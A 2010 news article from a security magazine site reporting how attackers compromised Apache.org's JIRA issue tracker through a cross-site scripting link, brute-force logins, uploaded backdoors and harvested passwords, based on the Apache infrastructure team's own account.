RSS Alerts

Share

More services

Related Links

Related Stories

  • Anti-virus: a technology update
    Anti-virus software might be the archetypal security product, but with so many high-profile malware attacks – including Stuxnet and Zeus – is it doing its job? Kevin Townsend investigates whether anti-virus software is still relevant
  • The battle of the internet browsers
    Browsers are the hackers’ window into your PC – but how are they compromised, and what are vendors doing to harden them? Danny Bradbury examines the techniques vendors are employing, and why user education is one of the primary solutions for increased security
  • Battle of the Internet Browsers
    Browsers are the hacker’s window into your PC – but how are they compromised, and what are vendors doing to harden them? Danny Bradbury examines the techniques vendors are employing, and looks at why user education is one of the primary solutions for increased security
  • Breaking the Online Bank
    As technology and online behaviors change, so too do methods to compromise a person’s – or organization’s – most vital assets: their financial details. Ted Kritsonis examines how cyber thieves are adapting, and what the banks are doing to stop them
    Members' Content
  • Comment: Companies Lose Encryption Keys – and Security – in the Amazon Cloud
    Jeff Hudson of Venafi discusses the importance of proper education and best practices for protecting SSL and SSH keys that secure the cloud

Top 5 Stories

News

Apache.org hit by XSS attack

15 April 2010

The website for the open source Apache Web server at Apache.org was compromised this month by a targeted attack, said the Apache Software Foundation, which has provided a detailed blow-by-blow account of the hack.

According to the infrastructure team at the Apache Software Foundation, attackers compromised a server at hosting company SliceHost, and used it to open a new issue on the Apache issue tracking server at brutus.apache.org. They submitted an issue with an error that included a tinyURL.com-shortened link, which redirected back to the Apache installation of the Atlassian JIRA issue tracking software.

The attackers had crafted a cross site scripting attack at that URL, designed to steal the session cookie from the user logged into the issue tracker.

"When this issue was opened against the infrastructure team, several of our administrators clicked on the link", said the infrastructure team in a blog post. "This compromised their sessions, including their JIRA administrator rights."

This attack was complemented by a group force password attack against the JIRA login page. Using these attacks, the attackers gained administrator privileges on a JIRA account, turned off notifications for a project, and changed the path used to upload attachments. They uploaded an attachment that was used to browse and copy the file system. "They also uploaded other [Java Server Pages] files that gave them backdoor access to the system using the account that JIRA runs under," the team explained.

By sending password reset emails to members of the Apache infrastructure team, the attackers were able to harvest passwords on administrator accounts, one of which was the same as the password to a local user account on the issue tracking server with full access to the sudo program, which allows users to run programs with root access. From there, they were able to compromise the main shell server, although they were unable to escalate privileges using compromised accounts.

"We started moving services to a different machine, thor.apache.org", said the infrastructure team. "The attackers had root access on brutus.apache.org for several hours, and we could no longer trust the operating system on the original machine."

Although Atlassian responded quickly to reports of the cross site scripting flaw and issued patches, the Apache team lamented what it says was a lack of responsiveness on the part of SliceHost. "Two days later, the very same virtual host (slice) attacked Atlassian directly", it said.

This article is featured in:
Application Security • Internet and Network Security • IT Forensics

 

Comment on this article

You must be registered and logged in to leave a comment about this article.

Terms & Conditions |Privacy |Website Design|Reed Exhibitions. All rights reserved. Copyright © 2012